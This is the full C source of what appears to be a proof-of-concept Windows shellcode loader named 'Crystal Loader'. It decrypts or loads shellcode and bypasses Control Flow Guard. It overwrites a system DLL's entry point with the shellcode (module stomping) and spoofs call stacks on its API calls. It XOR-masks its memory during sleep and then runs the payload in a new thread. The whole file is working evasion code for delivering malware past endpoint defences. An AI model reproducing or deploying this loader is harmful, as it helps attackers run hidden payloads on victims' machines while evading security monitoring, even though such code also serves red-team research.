#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "spoof.h"

// ============================================================
// Embedded payload support (generated by packer.py)
// ============================================================
#ifdef EMBEDDED_PAYLOAD
#include "payload.h"
#endif

// ============================================================
// Configuration
// ============================================================

// Sacrificial DLL for module stomping.
// Must have a .text section larger than your shellcode.
// Alternatives: xpsservices.dll, wbem\fastprox.dll, DUI70.dll
#ifndef STOMP_DLL
#define STOMP_DLL L"C:\\Windows\\System32\\dbghelp.dll"
#endif

#define XOR_KEY_LEN    128
#define NT_SUCCESS(s)  ((NTSTATUS)(s) >= 0)
#define NtCurrentProc() ((HANDLE)(LONG_PTR)-1)

// ============================================================
// NT types for CFG bypass
// ============================================================

typedef NTSTATUS (NTAPI* NtQueryInformationProcess_t)(
    HANDLE, ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI* NtQueryVirtualMemory_t)(
    HANDLE, PVOID, ULONG, PVOID, SIZE_T, PSIZE_T);
typedef NTSTATUS (NTAPI* NtSetInformationVirtualMemory_t)(
    HANDLE, ULONG, SIZE_T, PVOID, PVOID, ULONG);

#ifndef CFG_CALL_TARGET_VALID
#define CFG_CALL_TARGET_VALID 0x00000001
typedef struct { ULONG_PTR Offset; ULONG_PTR Flags; } CFG_CALL_TARGET_INFO_S;
#else
typedef CFG_CALL_TARGET_INFO CFG_CALL_TARGET_INFO_S;
#endif

typedef struct {
    DWORD                  dwNumberOfOffsets;
    PULONG                 plOutput;
    CFG_CALL_TARGET_INFO_S * ptOffsets;
    PVOID                  pMustBeZero;
    PVOID                  pMoarZero;
} VM_INFORMATION;

typedef struct {
    PVOID  VirtualAddress;
    SIZE_T NumberOfBytes;
} MEMORY_RANGE_ENTRY_S;

typedef struct {
    ULONG ExtendedProcessInfo;
    ULONG ExtendedProcessInfoBuffer;
} EXTENDED_PROCESS_INFORMATION;

#define ProcessControlFlowGuardPolicy  7
#define ProcessUserModeIOPL           16
#define ProcessCookie                 36
#define VmCfgCallTargetInformation     2

// ============================================================
// Memory tracking for sleep masking
// ============================================================

typedef struct {
    PVOID  base;
    SIZE_T size;
    DWORD  original_protect;
} MemorySection;

typedef struct {
    MemorySection sections[4];
    int    count;
    BYTE   xor_key[XOR_KEY_LEN];
} TrackedMemory;

// ============================================================
// Shellcode loading
// ============================================================

static BOOL LoadShellcodeFromFile(const char* path, BYTE** buf, DWORD* size) {
    HANDLE hFile = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ,
                               NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) return FALSE;

    *size = GetFileSize(hFile, NULL);
    *buf  = (BYTE*)VirtualAlloc(NULL, *size,
                                MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!*buf) { CloseHandle(hFile); return FALSE; }

    DWORD read = 0;
    ReadFile(hFile, *buf, *size, &read, NULL);
    CloseHandle(hFile);
    return (read == *size);
}

#ifdef EMBEDDED_PAYLOAD
static BOOL LoadShellcodeEmbedded(BYTE** buf, DWORD* size) {
    *size = sc_size;
    *buf  = (BYTE*)VirtualAlloc(NULL, *size,
                                MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!*buf) return FALSE;

    // decrypt: XOR with embedded key
    for (DWORD i = 0; i < *size; i++)
        (*buf)[i] = sc_encrypted[i] ^ sc_key[i % sc_key_len];

    return TRUE;
}
#endif

// ============================================================
// CFG bypass (ported from crystalkit/source/cfg.c)
// ============================================================

static BOOL CfgEnabled() {
    NtQueryInformationProcess_t pNtQIP =
        (NtQueryInformationProcess_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
    if (!pNtQIP) return FALSE;

    EXTENDED_PROCESS_INFORMATION info = {0};
    info.ExtendedProcessInfo       = ProcessControlFlowGuardPolicy;
    info.ExtendedProcessInfoBuffer = 0;

    NTSTATUS status = pNtQIP(NtCurrentProc(),
                             ProcessCookie | ProcessUserModeIOPL,
                             &info, sizeof(info), NULL);
    if (!NT_SUCCESS(status)) return FALSE;
    return info.ExtendedProcessInfoBuffer != 0;
}

static BOOL CfgBypass(PVOID address) {
    NtQueryVirtualMemory_t pNtQVM =
        (NtQueryVirtualMemory_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtQueryVirtualMemory");
    NtSetInformationVirtualMemory_t pNtSIVM =
        (NtSetInformationVirtualMemory_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtSetInformationVirtualMemory");
    if (!pNtQVM || !pNtSIVM) return FALSE;

    MEMORY_BASIC_INFORMATION mbi = {0};
    NTSTATUS status = pNtQVM(NtCurrentProc(), address, 0, &mbi, sizeof(mbi), 0);
    if (!NT_SUCCESS(status)) return FALSE;
    if (mbi.State != MEM_COMMIT || mbi.Type != MEM_IMAGE) return FALSE;

    CFG_CALL_TARGET_INFO_S cti = {0};
    cti.Offset = (ULONG_PTR)address - (ULONG_PTR)mbi.BaseAddress;
    cti.Flags  = CFG_CALL_TARGET_VALID;

    MEMORY_RANGE_ENTRY_S mre = {0};
    mre.VirtualAddress = mbi.BaseAddress;
    mre.NumberOfBytes  = mbi.RegionSize;

    ULONG output = 0;
    VM_INFORMATION vmi = {0};
    vmi.dwNumberOfOffsets = 1;
    vmi.plOutput          = &output;
    vmi.ptOffsets         = &cti;

    status = pNtSIVM(NtCurrentProc(), VmCfgCallTargetInformation,
                     1, &mre, &vmi, sizeof(vmi));

    // 0xC00000F4 = STATUS_INVALID_PARAMETER_4: try 24-byte struct (older Windows)
    if (status == (NTSTATUS)0xC00000F4)
        status = pNtSIVM(NtCurrentProc(), VmCfgCallTargetInformation,
                         1, &mre, &vmi, 24);

    if (!NT_SUCCESS(status)) {
        // 0xC0000045 = STATUS_INVALID_PAGE_PROTECTION: CFG not active on region
        return (status == (NTSTATUS)0xC0000045);
    }
    return TRUE;
}

// ============================================================
// Sleep masking (ported from crystalkit/source/mask.c)
// ============================================================

static void GenerateXorKey(BYTE* key) {
    LARGE_INTEGER pc;
    QueryPerformanceCounter(&pc);
    srand((unsigned int)(pc.QuadPart ^ GetTickCount64()));
    for (int i = 0; i < XOR_KEY_LEN; i++)
        key[i] = (BYTE)(rand() & 0xFF);
}

static void XorRegion(PVOID base, SIZE_T size, BYTE* key) {
    BYTE* p = (BYTE*)base;
    for (SIZE_T i = 0; i < size; i++)
        p[i] ^= key[i % XOR_KEY_LEN];
}

static void MaskMemory(TrackedMemory* mem, BOOL mask) {
    for (int i = 0; i < mem->count; i++) {
        MemorySection* s = &mem->sections[i];
        DWORD oldProt = 0;

        if (mask) {
            // make writable before encrypting
            FUNCTION_CALL call = {0};
            call.ptr     = (PVOID)VirtualProtect;
            call.argc    = 4;
            call.args[0] = spoof_arg(s->base);
            call.args[1] = spoof_arg(s->size);
            call.args[2] = spoof_arg(PAGE_READWRITE);
            call.args[3] = spoof_arg(&oldProt);
            SpoofCall(&call);
        }

        XorRegion(s->base, s->size, mem->xor_key);

        if (!mask) {
            // restore original protection after decrypting
            DWORD oldProt2 = 0;
            FUNCTION_CALL call = {0};
            call.ptr     = (PVOID)VirtualProtect;
            call.argc    = 4;
            call.args[0] = spoof_arg(s->base);
            call.args[1] = spoof_arg(s->size);
            call.args[2] = spoof_arg(s->original_protect);
            call.args[3] = spoof_arg(&oldProt2);
            SpoofCall(&call);
        }
    }
}

// ============================================================
// Main
// ============================================================

int main(int argc, char* argv[]) {
    printf("[*] Crystal Loader - CrystalKit Techniques POC\n");
    printf("    Techniques: module stomping + Draugr stack spoofing\n");
    printf("              + CFG bypass + sleep masking\n\n");

    // ---- 1. Load shellcode ----
    BYTE* shellcode = NULL;
    DWORD scSize    = 0;

#ifdef EMBEDDED_PAYLOAD
    (void)argc; (void)argv;
    if (!LoadShellcodeEmbedded(&shellcode, &scSize)) {
        printf("[-] Failed to decrypt embedded payload\n");
        return 1;
    }
    printf("[+] Decrypted embedded payload (%lu bytes)\n\n", scSize);
#else
    if (argc < 2) {
        printf("Usage: %s <shellcode.bin>\n", argv[0]);
        printf("\nGenerate test shellcode:\n");
        printf("  msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin\n");
        return 1;
    }
    if (!LoadShellcodeFromFile(argv[1], &shellcode, &scSize)) {
        printf("[-] Failed to load %s (error %lu)\n", argv[1], GetLastError());
        return 1;
    }
    printf("[+] Loaded %lu bytes from %s\n\n", scSize, argv[1]);
#endif

    // ---- 2. Initialize Draugr stack spoofing ----
    printf("[*] Initializing Draugr stack spoofing...\n");
    if (!SpoofInit()) {
        printf("[-] Stack spoofing init failed\n");
        return 1;
    }
    printf("[+] Draugr ready\n\n");

    // ---- 3. CFG bypass ----
    printf("[*] CFG bypass...\n");
    if (CfgEnabled()) {
        PVOID pNtContinue = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtContinue");
        if (pNtContinue && CfgBypass(pNtContinue))
            printf("    CFG enabled, bypassed for NtContinue\n");
        else
            printf("    CFG enabled, bypass failed (non-fatal)\n");
    } else {
        printf("    CFG not enabled\n");
    }
    printf("[+] CFG check done\n\n");

    // ---- 4. Module stomping ----
    printf("[*] Module stomping...\n");

    // LoadLibraryW via spoofed call
    FUNCTION_CALL call = {0};
    call.ptr     = (PVOID)LoadLibraryW;
    call.argc    = 1;
    call.args[0] = spoof_arg(STOMP_DLL);
    HMODULE hMod = (HMODULE)SpoofCall(&call);

    if (!hMod) {
        printf("    [-] LoadLibraryW failed\n");
        return 1;
    }
    printf("    Loaded sacrificial DLL at %p\n", hMod);

    // DisableThreadLibraryCalls
    DisableThreadLibraryCalls(hMod);

    // Find .text section and entry point
    PIMAGE_DOS_HEADER dh = (PIMAGE_DOS_HEADER)hMod;
    PIMAGE_NT_HEADERS nh = (PIMAGE_NT_HEADERS)((BYTE*)hMod + dh->e_lfanew);
    PIMAGE_SECTION_HEADER sh = IMAGE_FIRST_SECTION(nh);

    DWORD epRVA  = nh->OptionalHeader.AddressOfEntryPoint;
    PVOID ep     = (PVOID)((BYTE*)hMod + epRVA);
    DWORD textVA = 0, textSize = 0;

    for (int i = 0; i < nh->FileHeader.NumberOfSections; i++) {
        if (memcmp(sh[i].Name, ".text", 5) == 0) {
            textVA   = sh[i].VirtualAddress;
            textSize = sh[i].Misc.VirtualSize;
            break;
        }
    }

    if (!textSize) {
        printf("    [-] .text section not found\n");
        return 1;
    }

    DWORD available = textSize - (epRVA - textVA);
    printf("    .text section: %p, %lu bytes\n",
           (PVOID)((BYTE*)hMod + textVA), textSize);
    printf("    Entry point:   %p (%lu bytes available)\n", ep, available);

    if (scSize > available) {
        printf("    [-] Shellcode too large (%lu > %lu)\n", scSize, available);
        return 1;
    }

    // VirtualProtect to RW (spoofed)
    DWORD oldProt = 0;
    memset(&call, 0, sizeof(call));
    call.ptr     = (PVOID)VirtualProtect;
    call.argc    = 4;
    call.args[0] = spoof_arg(ep);
    call.args[1] = spoof_arg(scSize);
    call.args[2] = spoof_arg(PAGE_READWRITE);
    call.args[3] = spoof_arg(&oldProt);
    SpoofCall(&call);

    // write shellcode
    memcpy(ep, shellcode, scSize);
    printf("    Shellcode written to entry point\n");

    // VirtualProtect to RX (spoofed)
    DWORD tmp = 0;
    memset(&call, 0, sizeof(call));
    call.ptr     = (PVOID)VirtualProtect;
    call.argc    = 4;
    call.args[0] = spoof_arg(ep);
    call.args[1] = spoof_arg(scSize);
    call.args[2] = spoof_arg(PAGE_EXECUTE_READ);
    call.args[3] = spoof_arg(&tmp);
    SpoofCall(&call);

    printf("[+] Module stomping complete\n\n");

    // free shellcode buffer
    VirtualFree(shellcode, 0, MEM_RELEASE);

    // ---- 5. Sleep masking demo ----
    printf("[*] Sleep masking demo...\n");

    TrackedMemory tracked = {0};
    tracked.count = 1;
    tracked.sections[0].base             = ep;
    tracked.sections[0].size             = scSize;
    tracked.sections[0].original_protect = PAGE_EXECUTE_READ;
    GenerateXorKey(tracked.xor_key);
    printf("    Generated %d-byte XOR key\n", XOR_KEY_LEN);

    // save first 8 bytes for integrity check
    BYTE original_bytes[8];
    memcpy(original_bytes, ep, 8);

    printf("    Masking shellcode memory...\n");
    MaskMemory(&tracked, TRUE);

    // verify memory is encrypted
    if (memcmp(ep, original_bytes, 8) != 0)
        printf("    Memory encrypted (verified: bytes changed)\n");

    printf("    Sleeping 3 seconds (memory is encrypted)...\n");
    Sleep(3000);

    printf("    Unmasking shellcode memory...\n");
    MaskMemory(&tracked, FALSE);

    // verify integrity
    if (memcmp(ep, original_bytes, 8) == 0)
        printf("    Shellcode integrity OK\n");
    else
        printf("    [-] Shellcode integrity FAILED\n");

    printf("[+] Sleep masking verified\n\n");

    // ---- 6. Execute ----
    printf("[*] Executing shellcode...\n");

    memset(&call, 0, sizeof(call));
    call.ptr     = (PVOID)CreateThread;
    call.argc    = 6;
    call.args[0] = spoof_arg(NULL);
    call.args[1] = spoof_arg(0);
    call.args[2] = spoof_arg(ep);
    call.args[3] = spoof_arg(NULL);
    call.args[4] = spoof_arg(0);
    call.args[5] = spoof_arg(NULL);
    HANDLE hThread = (HANDLE)SpoofCall(&call);

    if (!hThread) {
        printf("[-] CreateThread failed\n");
        return 1;
    }

    printf("[+] Thread created, waiting...\n");
    WaitForSingleObject(hThread, INFINITE);

    return 0;
}
